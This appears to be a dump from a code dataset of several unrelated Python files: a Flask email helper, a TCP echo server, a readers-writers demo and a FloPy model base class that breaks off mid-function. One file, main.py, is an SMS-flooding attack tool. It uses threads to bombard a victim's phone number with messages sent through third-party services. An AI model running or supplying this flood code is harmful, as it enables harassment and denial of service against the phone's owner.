source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
email.py | #!/usr/bin/env python
# coding=utf-8
from threading import Thread
from flask import current_app, render_template, copy_current_request_context
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['FLASK_MAIL_SUBJECT_PREFIX'] + subject,
sender=app.config['FLASK_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
main.py | import time
from threading import Thread
# Import modules for SMS & CALL flood
import tools.SMS.sendRequest as request
import tools.SMS.numberTools as number
import tools.SMS.randomData as randomData
def SMS_ATTACK(threads, attack_time, phone):
# Finish
global FINISH
FINISH = False
threads_list = []
# Get services list
services = request.getServices()
# Make for Russian numbers
phone = number.normalize(phone)
# Get country name by phone
country = number.getCountry(phone)
print("[#] Starting SMS flood to number: " + phone + ", country: " + country + ", time: " + str(attack_time) + " secounds..")
# Send SMS
def sms_flood():
while not FINISH:
service = randomData.random_service(services)
service = request.Service(service)
service.sendMessage(phone)
# Start threads
for thread in range(threads):
print("[#] Staring thread " + str(thread))
t = Thread(target = sms_flood)
t.start()
threads_list.append(t)
# Sleep selected secounds
try:
time.sleep(attack_time)
except KeyboardInterrupt:
FINISH = True
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("[!] Attack stopped!") |
python3-60.py | #Example app - TCP Echo Server
#Make a TCP server in a process that handles multiple clients
#Echos back the data the client sent
#Imports
import logging
import multiprocessing
import socket
import select
logging.basicConfig(format='%(levelname)s - %(asctime)s: %(message)s',datefmt='%H:%M:%S', level=logging.DEBUG)
#Server
def chatserver(ip, port):
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
logging.info(f'Binding to {ip}:{port}')
server.bind((ip,port))
server.setblocking(False)
server.listen(100)
logging.info(f'Listening on {ip}:{port}')
readers = [server]
while True:
readable, writable, errored = select.select(readers,[],[],0.5)
for s in readable:
try:
if s == server:
client, address = s.accept()
client.setblocking(False)
readers.append(client)
logging.info(f'Connection: {address}')
else:
data = s.recv(1024)
if data:
logging.info(f'Echo: {data}')
s.send(data)
else:
logging.info(f'Remove: {s}')
s.close()
readers.remove(s)
except Exception as ex:
logging.warning(ex.args)
finally:
pass
#Main
def main():
svr = multiprocessing.Process(target=chatserver,args=['localhost',2067],daemon=True,name='Server')
while True:
command = input('Enter a command (start, stop)')
if command == 'start':
logging.info('Starting the server')
svr.start()
if command == 'stop':
logging.info('Stopping the server')
svr.terminate()
svr.join()
svr.close()
logging.info('Server stopped')
break
logging.info('Application finished')
if __name__ == "__main__":
main() |
readers_writers.py | from threading import Semaphore, Thread
from concurrency.synchronization import LightSwitch
def write(array, no_writers, no_readers, write_switch):
write_switch.lock(no_readers)
no_writers.acquire()
array[3] = randint(0, 30)
no_writers.release()
write_switch.unlock(no_readers)
def read(array, no_writers, no_readers, read_switch):
no_readers.acquire()
read_switch.lock(no_writers)
no_readers.release()
print(array[3])
read_switch.unlock(no_writers)
if __name__ == '__main__':
num_readers = num_writers = 30
read_switch = LightSwitch()
write_switch = LightSwitch()
no_readers = Semaphore(1)
no_writers = Semaphore(1)
array = range(10)
writers = [Thread(target=write, args=(array, no_writers, no_readers, write_switch))
for _ in range(num_writers)]
readers = [Thread(target=read, args=(array, no_writers, no_readers, read_switch))
for _ in range(num_readers)]
all_threads = writers + readers
for t in sample(all_threads, len(all_threads)):
t.start()
for t in sample(all_threads, len(all_threads)):
t.join()
|
mbase.py | """
mbase module
This module contains the base model class from which
all of the other models inherit from.
"""
from __future__ import print_function
import sys
import os
import subprocess as sp
import shutil
import threading
if sys.version_info > (3, 0):
import queue as Queue
else:
import Queue
from datetime import datetime
import copy
import numpy as np
from flopy import utils
from .version import __version__
if sys.version_info >= (3, 3):
from shutil import which
else:
from distutils.spawn import find_executable as which
# Global variables
iconst = 1 # Multiplier for individual array elements in integer and real arrays read by MODFLOW's U2DREL, U1DREL and U2DINT.
iprn = -1 # Printout flag. If >= 0 then array values read are printed in listing file.
class FileDataEntry(object):
def __init__(self, fname, unit, binflag=False, output=False, package=None):
self.fname = fname
self.unit = unit
self.binflag = binflag
self.output = output
self.package = package
class FileData(object):
def __init__(self):
self.file_data = []
return
def add_file(self, fname, unit, binflag=False, output=False, package=None):
ipop = []
for idx, file_data in enumerate(self.file_data):
if file_data.fname == fname or file_data.unit == unit:
ipop.append(idx)
self.file_data.append(FileDataEntry(fname, unit, binflag=binflag,
output=output, package=package))
return
class BaseModel(object):
"""
MODFLOW based models base class
Parameters
----------
modelname : string
Name of the model. Model files will be given this name. (default is
'modflowtest'
namefile_ext : string
name file extension (default is 'nam')
exe_name : string
name of the modflow executable
model_ws : string
Path to the model workspace. Model files will be created in this
directory. Default is None, in which case model_ws is assigned
to the current working directory.
"""
def __init__(self, modelname='modflowtest', namefile_ext='nam',
exe_name='mf2k.exe', model_ws=None,
structured=True, **kwargs):
"""
BaseModel init
"""
self.__name = modelname
self.namefile_ext = namefile_ext
self.namefile = self.__name + '.' + self.namefile_ext
self.packagelist = []
self.heading = ''
self.exe_name = exe_name
self.external_extension = 'ref'
if model_ws is None: model_ws = os.getcwd()
if not os.path.exists(model_ws):
try:
os.makedirs(model_ws)
except:
print(
'\n{0:s} not valid, workspace-folder was changed to {1:s}\n'.format(
model_ws, os.getcwd()))
model_ws = os.getcwd()
self._model_ws = model_ws
self.structured = structured
self.pop_key_list = []
self.cl_params = ''
# check for reference info in kwargs
# we are just carrying these until a dis package is added
self._xul = kwargs.pop("xul", None)
self._yul = kwargs.pop("yul", None)
self._rotation = kwargs.pop("rotation", 0.0)
self._proj4_str = kwargs.pop("proj4_str", "EPSG:4326")
self._start_datetime = kwargs.pop("start_datetime", "1-1-1970")
# Model file information
self.__onunit__ = 10
# external option stuff
self.array_free_format = True
self.free_format_input = True
self.parameter_load = False
self.array_format = None
self.external_fnames = []
self.external_units = []
self.external_binflag = []
self.external_output = []
self.package_units = []
self._next_ext_unit = None
# output files
self.output_fnames = []
self.output_units = []
self.output_binflag = []
self.output_packages = []
return
def next_unit(self, i=None):
if i is not None:
self.__onunit__ = i - 1
else:
self.__onunit__ += 1
return self.__onunit__
def next_ext_unit(self):
"""
Function to encapsulate next_ext_unit attribute
"""
next_unit = self._next_ext_unit + 1
self._next_ext_unit += 1
return next_unit
def export(self, f, **kwargs):
# for pak in self.packagelist:
# f = pak.export(f)
# return f
from .export import utils
return utils.model_helper(f, self, **kwargs)
def add_package(self, p):
"""
Add a package.
Parameters
----------
p : Package object
"""
for idx, u in enumerate(p.unit_number):
if u != 0:
if u in self.package_units or u in self.external_units:
try:
pn = p.name[idx]
except:
pn = p.name
msg = "WARNING: unit {} ".format(u) + \
"of package {} already in use".format(pn)
print(msg)
self.package_units.append(u)
for i, pp in enumerate(self.packagelist):
if pp.allowDuplicates:
continue
elif isinstance(p, type(pp)):
print('****Warning -- two packages of the same type: ',
type(p), type(pp))
print('replacing existing Package...')
self.packagelist[i] = p
return
if self.verbose:
print('adding Package: ', p.name[0])
self.packagelist.append(p)
def remove_package(self, pname):
"""
Remove a package from this model
Parameters
----------
pname : string
Name of the package, such as 'RIV', 'BAS6', etc.
"""
for i, pp in enumerate(self.packagelist):
if pname.upper() in pp.name:
if self.verbose:
print('removing Package: ', pp.name)
# Remove the package object from the model's packagelist
p = self.packagelist.pop(i)
# Remove the package unit number from the list of package
# units stored with the model
for iu in p.unit_number:
if iu in self.package_units:
self.package_units.remove(iu)
return
raise StopIteration(
'Package name ' + pname + ' not found in Package list')
def __getattr__(self, item):
"""
__getattr__ - syntactic sugar
Parameters
----------
item : str
3 character package name (case insensitive) or "sr" to access
the SpatialReference instance of the ModflowDis object
Returns
-------
sr : SpatialReference instance
pp : Package object
Package object of type :class:`flopy.pakbase.Package`
Note
----
if self.dis is not None, then the spatial reference instance is updated
using self.dis.delr, self.dis.delc, and self.dis.lenuni before being
returned
"""
if item == 'sr':
if self.dis is not None:
return self.dis.sr
else:
return None
if item == 'tr':
if self.dis is not None:
return self.dis.tr
else:
return None
if item == "start_datetime":
if self.dis is not None:
return self.dis.tr.start_datetime
else:
return None
return self.get_package(item)
def get_ext_dict_attr(self, ext_unit_dict=None, unit=None, filetype=None,
pop_key=True):
iu = None
fname = None
if ext_unit_dict is not None:
for key, value in ext_unit_dict.items():
if key == unit:
iu = key
fname = os.path.basename(value.filename)
break
elif value.filetype == filetype:
iu = key
fname = os.path.basename(value.filename)
if pop_key:
self.add_pop_key_list(iu)
break
return iu, fname
def _output_msg(self, i, add=True):
if add:
txt1 = 'Adding'
txt2 = 'to'
else:
txt1 = 'Removing'
txt2 = 'from'
msg = '{} {} '.format(txt1, self.output_fnames[i]) + \
'(unit={}) '.format(self.output_units[i]) + \
'{} the output list.'.format(txt2)
print(msg)
def add_output_file(self, unit, fname=None, extension='cbc',
binflag=True, package=None):
"""
Add an ascii or binary output file file for a package
Parameters
----------
unit : int
unit number of external array
fname : str
filename of external array. (default is None)
extension : str
extension to use for the cell-by-cell file. Only used if fname
is None. (default is cbc)
binflag : bool
boolean flag indicating if the output file is a binary file.
Default is True
package : str
string that defines the package the output file is attached to.
Default is None
"""
add_cbc = False
if unit > 0:
add_cbc = True
# determine if the file is in external_units
if abs(unit) in self.external_units:
idx = self.external_units.index(abs(unit))
if fname is None:
fname = os.path.basename(self.external_fnames[idx])
binflag = self.external_binflag[idx]
self.remove_external(unit=abs(unit))
# determine if the unit exists in the output data
if abs(unit) in self.output_units:
add_cbc = False
idx = self.output_units.index(abs(unit))
# determine if binflag has changed
if binflag is not self.output_binflag[idx]:
add_cbc = True
if add_cbc:
self.remove_output(unit=abs(unit))
else:
if package is not None:
self.output_packages[idx].append(package)
if add_cbc:
if fname is None:
fname = self.name + '.' + extension
# check if this file name exists for a different unit number
if fname in self.output_fnames:
idx = self.output_fnames.index(fname)
iut = self.output_units[idx]
if iut != unit:
# include unit number in fname if package has
# not been passed
if package is None:
fname = self.name + '.{}.'.format(unit) \
+ extension
# include package name in fname
else:
fname = self.name + '.{}.'.format(package) \
+ extension
else:
fname = os.path.basename(fname)
self.add_output(fname, unit, binflag=binflag, package=package)
return
def add_output(self, fname, unit, binflag=False, package=None):
"""
Assign an external array so that it will be listed as a DATA or
DATA(BINARY) entry in the name file. This will allow an outside
file package to refer to it.
Parameters
----------
fname : str
filename of external array
unit : int
unit number of external array
binflag : boolean
binary or not. (default is False)
"""
if fname in self.output_fnames:
print("BaseModel.add_output() warning: " +
"replacing existing filename {0}".format(fname))
idx = self.output_fnames.index(fname)
if self.verbose:
self._output_msg(idx, add=False)
self.output_fnames.pop(idx)
self.output_units.pop(idx)
self.output_binflag.pop(idx)
self.output_packages.pop(idx)
self.output_fnames.append(fname)
self.output_units.append(unit)
self.output_binflag.append(binflag)
if package is not None:
self.output_packages.append([package])
else:
self.output_packages.append([])
if self.verbose:
self._output_msg(-1, add=True)
return
def remove_output(self, fname=None, unit=None):
"""
Remove an output file from the model by specifying either the
file name or the unit number.
Parameters
----------
fname : str
filename of output array
unit : int
unit number of output array
"""
if fname is not None:
for i, e in enumerate(self.output_fnames):
if fname in e:
if self.verbose:
self._output_msg(i, add=False)
self.output_fnames.pop(i)
self.output_units.pop(i)
self.output_binflag.pop(i)
self.output_packages.pop(i)
elif unit is not None:
for i, u in enumerate(self.output_units):
if u == unit:
if self.verbose:
self._output_msg(i, add=False)
self.output_fnames.pop(i)
self.output_units.pop(i)
self.output_binflag.pop(i)
self.output_packages.pop(i)
else:
raise Exception(
' either fname or unit must be passed to remove_output()')
return
def get_output(self, fname=None, unit=None):
"""
Get an output file from the model by specifying either the
file name or the unit number.
Parameters
----------
fname : str
filename of output array
unit : int
unit number of output array
"""
if fname is not None:
for i, e in enumerate(self.output_fnames):
if fname in e:
return self.output_units[i]
return None
elif unit is not None:
for i, u in enumerate(self.output_units):
if u == unit:
return self.output_fnames[i]
return None
else:
raise Exception(
' either fname or unit must be passed to get_output()')
return
def set_output_attribute(self, fname=None, unit=None, attr=None):
"""
Set a variable in an output file from the model by specifying either
the file name or the unit number and a dictionary with attributes
to change.
Parameters
----------
fname : str
filename of output array
unit : int
unit number of output array
"""
idx = None
if fname is not None:
for i, e in enumerate(self.output_fnames):
if fname in e:
idx = i
break
return None
elif unit is not None:
for i, u in enumerate(self.output_units):
if u == unit:
idx = i
break
else:
raise Exception(
' either fname or unit must be passed ' +
' to set_output_attribute()')
if attr is not None:
if idx is not None:
for key, value in attr.items:
if key == 'binflag':
self.output_binflag[idx] = value
elif key == 'fname':
self.output_fnames[idx] = value
elif key == 'unit':
self.output_units[idx] = value
return
def get_output_attribute(self, fname=None, unit=None, attr=None):
"""
Get a attribute for an output file from the model by specifying either
the file name or the unit number.
Parameters
----------
fname : str
filename of output array
unit : int
unit number of output array
"""
idx = None
if fname is not None:
for i, e in enumerate(self.output_fnames):
if fname in e:
idx = i
break
return None
elif unit is not None:
for i, u in enumerate(self.output_units):
if u == unit:
idx = i
break
else:
raise Exception(
' either fname or unit must be passed ' +
' to set_output_attribute()')
v = None
if attr is not None:
if idx is not None:
if attr == 'binflag':
v = self.output_binflag[idx]
elif attr == 'fname':
v = self.output_fnames[idx]
elif attr == 'unit':
v = self.output_units[idx]
return v
def add_external(self, fname, unit, binflag=False, output=False):
"""
Assign an external array so that it will be listed as a DATA or
DATA(BINARY) entry in the name file. This will allow an outside
file package to refer to it.
Parameters
----------
fname : str
filename of external array
unit : int
unit number of external array
binflag : boolean
binary or not. (default is False)
"""
if fname in self.external_fnames:
print("BaseModel.add_external() warning: " +
"replacing existing filename {}".format(fname))
idx = self.external_fnames.index(fname)
self.external_fnames.pop(idx)
self.external_units.pop(idx)
self.external_binflag.pop(idx)
self.external_output.pop(idx)
if unit in self.external_units:
print("BaseModel.add_external() warning: " +
"replacing existing unit {}".format(unit))
idx = self.external_units.index(unit)
self.external_fnames.pop(idx)
self.external_units.pop(idx)
self.external_binflag.pop(idx)
self.external_output.pop(idx)
self.external_fnames.append(fname)
self.external_units.append(unit)
self.external_binflag.append(binflag)
self.external_output.append(output)
return
def remove_external(self, fname=None, unit=None):
"""
Remove an external file from the model by specifying either the
file name or the unit number.
Parameters
----------
fname : str
filename of external array
unit : int
unit number of external array
"""
plist = []
if fname is not None:
for i, e in enumerate(self.external_fnames):
if fname in e:
plist.append(i)
elif unit is not None:
for i, u in enumerate(self.external_units):
if u == unit:
plist.append(i)
else:
raise Exception(
' either fname or unit must be passed to remove_external()')
# remove external file
j = 0
for i in plist:
ipos = i - j
self.external_fnames.pop(ipos)
self.external_units.pop(ipos)
self.external_binflag.pop(ipos)
self.external_output.pop(ipos)
j += 1
return
def add_existing_package(self, filename, ptype=None,
copy_to_model_ws=True):
"""
Add an existing package to a model instance.
Parameters
----------
filename : str
the name of the file to add as a package
ptype : optional
the model package type (e.g. "lpf", "wel", etc). If None,
then the file extension of the filename arg is used
copy_to_model_ws : bool
flag to copy the package file into the model_ws directory.
Returns
-------
None
"""
if ptype is None:
ptype = filename.split('.')[-1]
ptype = str(ptype).upper()
# for pak in self.packagelist:
# if ptype in pak.name:
# print("BaseModel.add_existing_package() warning: " +\
# "replacing existing package {0}".format(ptype))
class Obj(object):
pass
fake_package = Obj()
fake_package.write_file = lambda: None
fake_package.extra = ['']
fake_package.name = [ptype]
fake_package.extension = [filename.split('.')[-1]]
fake_package.unit_number = [self.next_ext_unit()]
if copy_to_model_ws:
base_filename = os.path.split(filename)[-1]
fake_package.file_name = [base_filename]
shutil.copy2(filename, os.path.join(self.model_ws, base_filename))
else:
fake_package.file_name = [filename]
fake_package.allowDuplicates = True
self.add_package(fake_package)
def get_name_file_entries(self):
"""
Get a string representation of the name file.
Parameters
----------
"""
s = ''
for p in self.packagelist:
for i in range(len(p.name)):
if p.unit_number[i] == 0:
continue
s += '{:14s} {:5d} '.format(p.name[i], p.unit_number[i]) + \
'{:s} {:s}\n'.format(p.file_name[i], p.extra[i])
return s
def has_package(self, name):
"""
Check if package name is in package list.
Parameters
----------
name : str
Name of the package, 'DIS', 'BAS6', etc. (case-insensitive).
Returns
-------
bool
True if package name exists, otherwise False if not found.
"""
if not name:
raise ValueError('invalid package name')
name = name.upper()
for p in self.packagelist:
for pn in p.name:
if pn.upper() == name:
return True
return False
def get_package(self, name):
"""
Get a package.
Parameters
----------
name : str
Name of the package, 'RIV', 'LPF', etc. (case-insensitive).
Returns
-------
pp : Package object
Package object of type :class:`flopy.pakbase.Package`
"""
if not name:
raise ValueError('invalid package name')
name = name.upper()
for pp in (self.packagelist):
if pp.name[0].upper() == name:
return pp
return None
def get_package_list(self):
"""
Get a list of all the package names.
Parameters
----------
Returns
-------
val : list of strings
Can be used to see what packages are in the model, and can then
be used with get_package to pull out individual packages.
"""
val = []
for pp in (self.packagelist):
val.append(pp.name[0].upper())
return val
def set_version(self, version):
self.version = version.lower()
# check that this is a valid model version
if self.version not in list(self.version_types.keys()):
err = 'Error: Unsupported model version ({}).'.format(
self.version) + \
' Valid model versions are:'
for v in list(self.version_types.keys()):
err += ' {}'.format(v)
raise Exception(err)
# set namefile heading
heading = '# Name file for ' + \
'{}, '.format(self.version_types[self.version]) + \
'generated by Flopy version {}.'.format(__version__)
self.heading = heading
# set heading for each package
for p in self.get_package_list():
pak = self.get_package(p)
heading = '# {} package for '.format(pak.name[0]) + \
'{}, '.format(self.version_types[self.version]) + \
'generated by Flopy version {}.'.format(__version__)
pak.heading = heading
return None
def change_model_ws(self, new_pth=None, reset_external=False):
"""
Change the model work space.
Parameters
----------
new_pth : str
Location of new model workspace. If this path does not exist,
it will be created. (default is None, which will be assigned to
the present working directory).
Returns
-------
val : list of strings
Can be used to see what packages are in the model, and can then
be used with get_package to pull out individual packages.
"""
if new_pth is None:
new_pth = os.getcwd()
if not os.path.exists(new_pth):
try:
sys.stdout.write(
'\ncreating model workspace...\n {}\n'.format(new_pth))
os.makedirs(new_pth)
except:
line = '\n{} not valid, workspace-folder '.format(new_pth) + \
'was changed to {}\n'.format(os.getcwd())
print(line)
new_pth = os.getcwd()
# --reset the model workspace
old_pth = self._model_ws
self._model_ws = new_pth
line = '\nchanging model workspace...\n {}\n'.format(new_pth)
sys.stdout.write(line)
# reset the paths for each package
for pp in (self.packagelist):
pp.fn_path = os.path.join(self.model_ws, pp.file_name[0])
# create the external path (if needed)
if hasattr(self, "external_path") and self.external_path is not None \
and not os.path.exists(os.path.join(self._model_ws,
self.external_path)):
pth = os.path.join(self._model_ws, self.external_path)
os.makedirs(pth)
if reset_external:
self._reset_external(pth, old_pth)
elif reset_external:
self._reset_external(self._model_ws, old_pth)
return None
def _reset_external(self, pth, old_pth):
new_ext_fnames = []
for ext_file, output in zip(self.external_fnames,
self.external_output):
# new_ext_file = os.path.join(pth, os.path.split(ext_file)[-1])
# this is a wicked mess
if output:
# new_ext_file = os.path.join(pth, os.path.split(ext_file)[-1])
new_ext_file = ext_file
else:
# fpth = os.path.abspath(os.path.join(old_pth, ext_file))
# new_ext_file = os.path.relpath(fpth, os.path.abspath(pth))
fdir = os.path.dirname(ext_file)
if fdir == '':
fpth = os.path.abspath(os.path.join(old_pth, ext_file))
else:
fpth = ext_file
ao = os.path.abspath(os.path.dirname(fpth))
ep = os.path.abspath(pth)
relp = os.path.relpath(ao, ep)
new_ext_file = os.path.join(relp, os.path.basename(ext_file))
new_ext_fnames.append(new_ext_file)
self.external_fnames = new_ext_fnames
@property
def model_ws(self):
return copy.deepcopy(self._model_ws)
def _set_name(self, value):
"""
Set model name
Parameters
----------
value : str
Name to assign to model.
"""
self.__name = str(value)
self.namefile = self.__name + '.' + self.namefile_ext
for p in self.packagelist:
for i in range(len(p.extension)):
p.file_name[i] = self.__name + '.' + p.extension[i]
p.fn_path = os.path.join(self.model_ws, p.file_name[0])
def __setattr__(self, key, value):
if key == "free_format_input":
# if self.bas6 is not None:
# self.bas6.ifrefm = value
super(BaseModel, self).__setattr__(key, value)
elif key == "name":
self._set_name(value)
elif key == "model_ws":
self.change_model_ws(value)
elif key == "sr":
assert isinstance(value, utils.SpatialReference)
if self.dis is not None:
self.dis.sr = value
else:
raise Exception("cannot set SpatialReference -"
"ModflowDis not found")
elif key == "tr":
assert isinstance(value, utils.TemporalReference)
if self.dis is not None:
self.dis.tr = value
else:
raise Exception("cannot set TemporalReference -"
"ModflowDis not found")
elif key == "start_datetime":
if self.dis is not None:
self.dis.start_datetime = value
self.tr.start_datetime = value
else:
raise Exception("cannot set start_datetime -"
"ModflowDis not found")
else:
super(BaseModel, self).__setattr__(key, value)
def run_model(self, silent=False, pause=False, report=False,
normal_msg='normal termination'):
"""
This method will run the model using subprocess.Popen.
Parameters
----------
silent : boolean
Echo run information to screen (default is True).
pause : boolean, optional
Pause upon completion (default is False).
report : boolean, optional
Save stdout lines to a list (buff) which is returned
by the method . (default is False).
normal_msg : str
Normal termination message used to determine if the
run terminated normally. (default is 'normal termination')
Returns
-------
(success, buff)
success : boolean
buff : list of lines of stdout
"""
return run_model(self.exe_name, self.namefile, model_ws=self.model_ws,
silent=silent, pause=pause, report=report,
normal_msg=normal_msg)
def load_results(self):
print('load_results not implemented')
return None
def write_input(self, SelPackList=False, check=False):
"""
Write the input.
Parameters
----------
SelPackList : False or list of packages
"""
if check:
# run check prior to writing input
self.check(f='{}.chk'.format(self.name), verbose=self.verbose,
level=1)
# reset the model to free_format if parameter substitution was
# performed on a model load
if self.parameter_load and not self.free_format_input:
if self.verbose:
print('\nResetting free_format_input to True to ' +
'preserve the precision of the parameter data.')
self.free_format_input = True
if self.verbose:
print('\nWriting packages:')
if SelPackList == False:
for p in self.packagelist:
if self.verbose:
print(' Package: ', p.name[0])
# prevent individual package checks from running after
# model-level package check above
# otherwise checks are run twice
# or the model level check procedure would have to be split up
# or each package would need a check argument,
# or default for package level check would have to be False
try:
p.write_file(check=False)
except TypeError:
p.write_file()
else:
for pon in SelPackList:
for i, p in enumerate(self.packagelist):
if pon in p.name:
if self.verbose:
print(' Package: ', p.name[0])
try:
p.write_file(check=False)
except TypeError:
p.write_file()
break
if self.verbose:
print(' ')
# write name file
self.write_name_file()
# os.chdir(org_dir)
return
def write_name_file(self):
"""
Every Package needs its own writenamefile function
"""
raise Exception(
'IMPLEMENTATION ERROR: writenamefile must be overloaded')
def set_model_units(self):
"""
Every model needs its own set_model_units method
"""
raise Exception(
'IMPLEMENTATION ERROR: set_model_units must be overloaded')
@property
def name(self):
"""
Get model name
Returns
-------
name : str
name of model
"""
return copy.deepcopy(self.__name)
def add_pop_key_list(self, key):
"""
Add a external file unit number to a list that will be used to remove
model output (typically binary) files from ext_unit_dict.
Parameters
----------
key : int
file unit number
Returns
-------
Examples
--------
"""
if key not in self.pop_key_list:
self.pop_key_list.append(key)
def check(self, f=None, verbose=True, level=1):
"""
Check model data for common errors.
Parameters
----------
f : str or file handle
String defining file name or file handle for summary file
of check method output. If a string is passed a file handle
is created. If f is None, check method does not write
results to a summary file. (default is None)
verbose : bool
Boolean flag used to determine if check method results are
written to the screen
level : int
Check method analysis level. If level=0, summary checks are
performed. If level=1, full checks are performed.
Returns
-------
None
Examples
--------
>>> import flopy
>>> m = flopy.modflow.Modflow.load('model.nam')
>>> m.check()
"""
# check instance for model-level check
chk = utils.check(self, f=f, verbose=verbose, level=level)
results = {}
for p in self.packagelist:
if chk.package_check_levels.get(p.name[0].lower(), 0) <= level:
results[p.name[0]] = p.check(f=None, verbose=False,
level=level - 1)
# model level checks
# solver check
if self.version in chk.solver_packages.keys():
solvers = set(chk.solver_packages[self.version]).intersection(
set(self.get_package_list()))
if not solvers:
chk._add_to_summary('Error', desc='\r No solver package',
package='model')
elif len(list(solvers)) > 1:
for s in solvers:
chk._add_to_summary('Error',
desc='\r Multiple solver packages',
package=s)
else:
chk.passed.append('Compatible solver package')
# check for unit number conflicts
package_units = {}
duplicate_units = {}
for p in self.packagelist:
for i in range(len(p.name)):
if p.unit_number[i] != 0:
if p.unit_number[i] in package_units.values():
duplicate_units[p.name[i]] = p.unit_number[i]
otherpackage = [k for k, v in package_units.items()
if v == p.unit_number[i]][0]
duplicate_units[otherpackage] = p.unit_number[i]
if len(duplicate_units) > 0:
for k, v in duplicate_units.items():
chk._add_to_summary('Error', package=k, value=v,
desc='unit number conflict')
else:
chk.passed.append('Unit number conflicts')
# add package check results to model level check summary
for k, r in results.items():
if r is not None and r.summary_array is not None: # currently SFR doesn't have one
chk.summary_array = np.append(chk.summary_array,
r.summary_array).view(
np.recarray)
chk.passed += ['{} package: {}'.format(r.package.name[0], psd)
for psd in r.passed]
chk.summarize()
return chk
def plot(self, SelPackList=None, **kwargs):
"""
Plot 2-D, 3-D, transient 2-D, and stress period list (MfList)
model input data
Parameters
----------
SelPackList : bool or list
List of of packages to plot. If SelPackList=None all packages
are plotted. (default is None)
**kwargs : dict
filename_base : str
Base file name that will be used to automatically generate file
names for output image files. Plots will be exported as image
files if file_name_base is not None. (default is None)
file_extension : str
Valid matplotlib.pyplot file extension for savefig(). Only used
if filename_base is not None. (default is 'png')
mflay : int
MODFLOW zero-based layer number to return. If None, then all
all layers will be included. (default is None)
kper : int
MODFLOW zero-based stress period number to return.
(default is zero)
key : str
MfList dictionary key. (default is None)
Returns
----------
axes : list
Empty list is returned if filename_base is not None. Otherwise
a list of matplotlib.pyplot.axis are returned.
See Also
--------
Notes
-----
Examples
--------
>>> import flopy
>>> ml = flopy.modflow.Modflow.load('test.nam')
>>> ml.plot()
"""
# valid keyword arguments
if 'kper' in kwargs:
kper = int(kwargs.pop('kper'))
else:
kper = 0
if 'mflay' in kwargs:
mflay = kwargs.pop('mflay')
else:
mflay = None
if 'filename_base' in kwargs:
fileb = kwargs.pop('filename_base')
else:
fileb = None
if 'file_extension' in kwargs:
fext = kwargs.pop('file_extension')
fext = fext.replace('.', '')
else:
fext = 'png'
if 'key' in kwargs:
key = kwargs.pop('key')
else:
key = None
if self.verbose:
print('\nPlotting Packages')
axes = []
ifig = 0
if SelPackList is None:
for p in self.packagelist:
caxs = p.plot(initial_fig=ifig,
filename_base=fileb, file_extension=fext,
kper=kper, mflay=mflay, key=key)
# unroll nested lists of axes into a single list of axes
if isinstance(caxs, list):
for c in caxs:
axes.append(c)
else:
axes.append(caxs)
# update next active figure number
ifig = len(axes) + 1
else:
for pon in SelPackList:
for i, p in enumerate(self.packagelist):
if pon in p.name:
if self.verbose:
print(' Plotting Package: ', p.name[0])
caxs = p.plot(initial_fig=ifig,
filename_base=fileb, file_extension=fext,
kper=kper, mflay=mflay, key=key)
# unroll nested lists of axes into a single list of axes
if isinstance(caxs, list):
for c in caxs:
axes.append(c)
else:
axes.append(caxs)
# update next active figure number
ifig = len(axes) + 1
break
if self.verbose:
print(' ')
return axes
def to_shapefile(self, filename, package_names=None, **kwargs):
"""
Wrapper function for writing a shapefile for the model grid. If
package_names is not None, then search through the requested packages
looking for arrays that can be added to the shapefile as attributes
Parameters
----------
filename : string
name of the shapefile to write
package_names : list of package names (e.g. ["dis","lpf"])
Packages to export data arrays to shapefile. (default is None)
Returns
-------
None
Examples
--------
>>> import flopy
>>> m = flopy.modflow.Modflow()
>>> m.to_shapefile('model.shp', SelPackList)
"""
import warnings
warnings.warn("to_shapefile() is deprecated. use .export()")
self.export(filename, package_names=package_names)
return
def run_model(exe_name, namefile, model_ws='./',
silent=False, pause=False, report=False,
normal_msg='normal termination', use_async=False,
cargs=None):
"""
This function will run the model using subprocess.Popen. It
communicates with the model's stdout asynchronously and reports
progress to the screen with timestamps
Parameters
----------
exe_name : str
Executable name (with path, if necessary) to run.
namefile : str
Namefile of model to run. The namefile must be the
filename of the namefile without the path. Namefile can be None
to allow programs that do not require a control file (name file)
to be passed as a command line argument.
model_ws : str
Path to the location of the namefile. (default is the
current working directory - './')
silent : boolean
Echo run information to screen (default is True).
pause : boolean, optional
Pause upon completion (default is False).
report : boolean, optional
Save stdout lines to a list (buff) which is returned
by the method . (default is False).
normal_msg : str
Normal termination message used to determine if the
run terminated normally. (default is 'normal termination')
use_async : boolean
asynchronously read model stdout and report with timestamps. good for
models that take long time to run. not good for models that run
really fast
cargs : str or list of strings
additional command line arguments to pass to the executable.
Default is None
Returns
-------
(success, buff)
success : boolean
buff : list of lines of stdout
"""
success = False
buff = []
# convert normal_msg to lower case for comparison
if isinstance(normal_msg, str):
normal_msg = [normal_msg.lower()]
elif isinstance(normal_msg, list):
for idx, s in enumerate(normal_msg):
normal_msg[idx] = s.lower()
# Check to make sure that program and namefile exist
exe = which(exe_name)
if exe is None:
import platform
if platform.system() in 'Windows':
if not exe_name.lower().endswith('.exe'):
exe = which(exe_name + '.exe')
if exe is None:
s = 'The program {} does not exist or is not executable.'.format(
exe_name)
raise Exception(s)
else:
if not silent:
s = 'FloPy is using the following ' + \
' executable to run the model: {}'.format(exe)
print(s)
if namefile is not None:
if not os.path.isfile(os.path.join(model_ws, namefile)):
s = 'The namefile for this model ' + \
'does not exists: {}'.format(namefile)
raise Exception(s)
# simple little function for the thread to target
def q_output(output, q):
for line in iter(output.readline, b''):
q.put(line)
# time.sleep(1)
# output.close()
# create a list of arguments to pass to Popen
argv = [exe_name]
if namefile is not None:
argv.append(namefile)
# add additional arguments to Popen arguments
if cargs is not None:
if isinstance(cargs, str):
cargs = [cargs]
for t in cargs:
argv.append(t)
# run the model with Popen
proc = sp.Popen(argv,
stdout=sp.PIPE, stderr=sp.STDOUT, cwd=model_ws)
if not use_async:
while True:
line = proc.stdout.readline()
c = line.decode('utf-8')
if c != '':
for msg in normal_msg:
if msg in c.lower():
success = True
break
c = c.rstrip('\r\n')
